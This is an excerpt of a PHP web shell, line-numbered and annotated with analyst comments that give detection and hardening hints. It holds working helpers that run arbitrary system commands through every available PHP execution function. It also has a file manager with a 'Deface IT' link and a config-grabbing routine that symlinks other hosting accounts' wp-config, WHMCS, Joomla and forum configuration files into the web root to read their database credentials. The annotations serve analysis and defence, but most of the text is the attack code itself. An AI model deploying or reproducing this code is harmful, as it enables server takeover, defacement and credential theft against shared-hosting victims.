790 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
791 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
792 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
793 myparam('OS Version',myexe('ver'));
794 myparam('Account Settings',myexe('net accounts'));
795 myparam('User Accounts',myexe('net user'));
796 }
797 echo '</div>';
798 }
799
800
801
// ANALYST NOTE: second command-execution helper. Runs $in with the first of exec, passthru, system,
// shell_exec for which function_exists() is true, falling back to popen(), and returns the captured
// output as a string (empty string when nothing could be run). Output of passthru()/system() is
// captured with output buffering instead of being sent to the client.
// Hardening: as with execmd(), every one of these functions has to be unavailable for the helper
// to stop working.
802 function myexe($in)
803 {
804 $out = '';
805 if (function_exists('exec')) {
806 @exec($in,$out);
807 $out = @join("\n",$out);
808 } elseif (function_exists('passthru')) {
809 ob_start();
810 @passthru($in);
811 $out = ob_get_clean();
812 } elseif (function_exists('system')) {
813 ob_start();
814 @system($in);
815 $out = ob_get_clean();
816 } elseif (function_exists('shell_exec')) {
817 $out = shell_exec($in);
818 } elseif (is_resource($f = @popen($in,"r"))) {
819 $out = "";
820 while(!@feof($f))
821 $out .= fread($f,1024);
822 pclose($f);
823 }
824 return $out;
825}
826
// ANALYST NOTE: third command-execution helper. Runs $command with the first available of exec,
// shell_exec, popen, system, passthru, proc_open (tested with function_exists() in that order) and
// returns the captured output passed through htmlspecialchars(), i.e. ready for display in the
// shell's HTML page. Unlike execmd() and myexe(), the calls here are not @-suppressed.
827 function exec_all($command)
828 {
829
830 $output = '';
831 if(function_exists('exec'))
832 {
833 exec($command,$output);
834 $output = join("\n",$output);
835 }
836
837 else if(function_exists('shell_exec'))
838 {
839 $output = shell_exec($command);
840 }
841
842 else if(function_exists('popen'))
843 {
844 $handle = popen($command , "r"); // Open the command pipe for reading
845 if(is_resource($handle))
846 {
// The read loop itself also adapts to whichever of fread()/fgets() is available.
847 if(function_exists('fread') && function_exists('feof'))
848 {
849 while(!feof($handle))
850 {
851 $output .= fread($handle, 512);
852 }
853 }
854 else if(function_exists('fgets') && function_exists('feof'))
855 {
856 while(!feof($handle))
857 {
858 $output .= fgets($handle,512);
859 }
860
861
862
863 }
864 }
865 pclose($handle);
866 }
867
868
869 else if(function_exists('system'))
870 {
871 ob_start(); //start output buffering
872 system($command);
873 $output = ob_get_contents(); // Get the ouput
874 ob_end_clean(); // Stop output buffering
875 }
876
877 else if(function_exists('passthru'))
878 {
879 ob_start(); //start output buffering
880 passthru($command);
881 $output = ob_get_contents(); // Get the ouput
882 ob_end_clean(); // Stop output buffering
883 }
884
885 else if(function_exists('proc_open'))
886 {
887 $descriptorspec = array(
888 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
889 );
890 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
891 if(is_resource($handle))
892 {
893 if(function_exists('fread') && function_exists('feof'))
894 {
895 while(!feof($pipes[1]))
896 {
897 $output .= fread($pipes[1], 512);
898 }
899 }
900 else if(function_exists('fgets') && function_exists('feof'))
901 {
902 while(!feof($pipes[1]))
903 {
904 $output .= fgets($pipes[1],512);
905 }
906 }
907 }
908 pclose($handle);
909 }
910
911 return(htmlspecialchars($output));
912
913}
914
// Two status values computed once for display: an ON/OFF HTML fragment for whether open_basedir is
// set, and "Yes"/"No" for whether /etc/passwd is readable by the PHP process.
915$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
916$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
917
// Returns an "owner / group" label for the file browser.
// Without the POSIX extension it returns "<uid>/<gid>" from getmyuid()/getmygid() and ignores
// $value; with it, the owner and group names of the path $value are looked up.
918function getOGid($value)
919{
920 if(!function_exists('posix_getegid')) {
921 $user = @get_current_user();
922 $uid = @getmyuid();
923 $gid = @getmygid();
924 $group = "?";
925 $owner = $uid . "/". $gid;
926 return $owner;
927 } else {
928 $name=@posix_getpwuid(@fileowner($value));
929 $group=@posix_getgrgid(@filegroup($value));
930 $owner = $name['name']. " / ". $group['name'];
931 return $owner;
932 }
933}
934
935function mainfun($dir)
936{
937 global $ind, $directorysperator,$os;
938
939 $mydir = basename(dirname(__FILE__));
940 $pdir = str_replace($mydir,"",$dir);
941 $pdir = str_replace("/","",$dir);
942
943 $files = array();
944 $dirs = array();
945
946 $odir=opendir($dir);
947 while($file = readdir($odir))
948 {
949 if(is_dir($dir.'/'.$file))
950 {
951 $dirs[]=$file;
952 }
953 else
954 {
955 $files[]=$file;
956 }
957 }
958 $countfiles = count($dirs) + count($files);
959 $dircount = count($dirs);
960 $dircount = $dircount-2;
961 $myfiles = array_merge($dirs,$files);
962 $i = 0;
963 if(is_dir($dir))
964 {
965 if(scandir($dir) === false)
966 echo "<center><font size=3>Directory isn't readable</font></center>";
967 else
968 {
969?><form method="post" id="myform" name="myform">
970 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
971 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
972 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
973 <tr style="background-color:#0C0C0C; height:12px;">
974 <th>Name</th>
975 <th>Size</th>
976 <th>Permissions</th>
977 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
978 <th>Modification Date</th>
979 <th>Rename</th>
980 <th>Download</th>
981 <th style="width:2%;">Action</th>
982 </tr>
983 <?php
984 foreach($myfiles as $val)
985 {
986 $vv = addslashes($dir . $directorysperator . $val);
987 $i++;
988
989 if($val == ".")
990 {
991
992 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
993 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
994
995 <?php if($os != 'Windows')
996 {
997 echo "<td align=center><font size=2>";
998 echo getOGid($dir)."</font></td>";
999 }
1000 ?>
1001
1002 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1003 <td></td><td></td><td></td></</tr><?php
1004
1005 }
1006 else if($val == "..")
1007 {
1008 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1009 $vv = addslashes($val);
1010 if(empty($vv))
1011 $vv = "/"; ?>
1012 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1013 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1014 <?php if($os != 'Windows')
1015 {
1016 echo "<td align=center><font size=2>";
1017 echo getOGid($val)."</font></td>";
1018
1019 } ?>
1020 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
1021 <td></td><td></td><td></td></tr><?php continue;
1022 }
1023 else if(is_dir($vv))
1024 {
1025 ?>
1026 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1027 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
1028 <td class='info'><font size=2>DIR</font></td>
1029
1030 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1031 <?php if($os != 'Windows')
1032 {
1033 echo "<td align=center><font size=2>";
1034 echo getOGid($val)."</font></td>";
1035 } ?>
1036 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1037 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1038 <td></td>
1039 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1040 </tr></font>
1041 <?php
1042 }
1043 else if(is_file($vv))
1044 {
1045 ?>
1046 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1047 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
1048
1049 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
1050
1051 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1052
1053 <?php if($os != 'Windows')
1054 {
1055 echo "<td align=center><font size=2>";
1056 echo getOGid($val)."</font></td>";
1057 } ?>
1058 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1059
1060 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1061 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
1062 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1063 </tr>
1064 <p>
1065 <?php
1066 }
1067 }
1068
1069 echo "</table>
1070<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
1071<select class=sbox name=choice style='width: 100px;'>
1072 <option value=delete>Delete</option>
1073 <option value=chmod>Change mode</option>
1074 if(class_exists('ZipArchive'))
1075 { <option value=compre>Compress</option>
1076 <option value=uncompre>Uncompress</option> }
1077 </select>
1078
1079 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
1080 }}
1081 else
1082 {
1083 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
1084 }
1085
1086}
// Handler for the "script" request parameter: prints a two-link menu. Each link calls the
// page's getdata() JavaScript helper (defined outside this block) with 'manuallyscript' or
// 'scriptlocator', the parameter names tested by the two branches that follow.
// Triage note: when sent in the query string, these parameter names on a .php URL are a
// usable request-log indicator for this panel.
1087if(isset($_REQUEST["script"]))
1088{
 // Computed here but not read anywhere in this branch.
1089 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
1090 ?>
1091 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1092 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1093 </tr></table></center>
1094 <?php
1095}
// Handler for the "manuallyscript" request parameter: renders a form with one textarea named
// "passwd". The button hands the textarea value to manuallyscriptfn(), a JavaScript helper
// defined outside this block.
// NOTE(review): presumably that helper submits the text to the "scriptlocator" handler, which
// reads $_REQUEST['passwd'] -- confirm against the script section of the page.
1096else if(isset($_REQUEST['manuallyscript']))
1097{
1098 ?>
1099 <center>
1100 <form action="<?php echo $self; ?>" method="post">
1101 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1102 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
1103 </form>
1104 </center>
1105 <?php
1106}
1107else if(isset($_REQUEST['scriptlocator']))
1108{
1109 if(stristr(php_uname(),"Linux"))
1110 {
1111 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1112 $path=explode('/',$url);
1113 $url =str_replace($path[count($path)-1],'',$url);
/**
 * Creates symbolic links in the current working directory that point at well-known
 * application configuration files under another account's public_html.
 *
 * For each of the home roots /home and /home2 .. /home7, a hard-coded list of paths (the list
 * varies slightly per root) is linked as "<pdomain>~~<label>.txt", with labels such as
 * vBulletin, mybb, Phpbb, ipb, Wordpress, Joomla, Whm and Smf. The return value of every
 * symlink() call is ignored, so missing targets and name collisions are silent.
 *
 * Detection: symlinks inside a web root whose names contain "~~" and end in ".txt", and whose
 * targets resolve into a different account's home directory.
 * Mitigation: list symlink in PHP's disable_functions, serve with Apache
 * "Options SymLinksIfOwnerMatch" instead of FollowSymLinks, and keep application config files
 * unreadable to other accounts.
 *
 * @param string $usern   Account name used to build the /homeN/<usern>/public_html target paths.
 * @param string $pdomain Prefix for the link names created in the current directory.
 */
1114 function syml($usern,$pdomain)
1115 {
1116 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1117 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1118 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1119 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1120 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1121 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1122 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1123 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1124 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1125 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1126 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1127 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1128 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1129 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1130 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1131 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1132 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1133 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1134 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1135 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1136 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1137 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1138 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1139 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1140 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1141 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1142 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1143 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1144 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1145 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1146 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1147 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1148 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1149 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1150 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1151 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1152 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1153 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1154 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1155 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1156 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1157 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1158 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1159 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1160 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1161 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1162 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1163 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1164 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1165 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1166 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1167 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1168 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1169 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1170 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1171 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1172 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1173 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1174 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1175 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1176 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1177 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1178 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1179 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1180 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1181 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1182 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1183 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1184 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1185 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1186 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1187 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1188 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1189 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1190 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1191 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1192 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1193 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1194 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1195 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1196 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1197 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1198 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1199 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1200 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1201 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1202 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1203 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1204 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1205 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1206 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1207 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1208 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1209 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1210 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1211 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1212 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1213 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1214 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1215 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1216 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1217 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1218 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1219 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1220 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1221 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1222 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1223 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1224 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1225 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1226 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1227 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1228 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1229 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1230 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1231 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1232 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1233 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1234 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1235 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1236 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1237 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1238 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1239 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1240 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1241 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1242 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1243 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1244 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1245 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1246 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1247 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1248 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1249 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1250 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1251 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1252 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1253 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1254 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1255 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1256 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1257 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1258 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1259 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1260 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1261 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1262 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1263 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1264 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1265 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1266 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1267 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1268 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1269 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1270 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1271 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1272 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1273 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1274 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1275 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1276 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1277 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1278 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1279 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1280 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
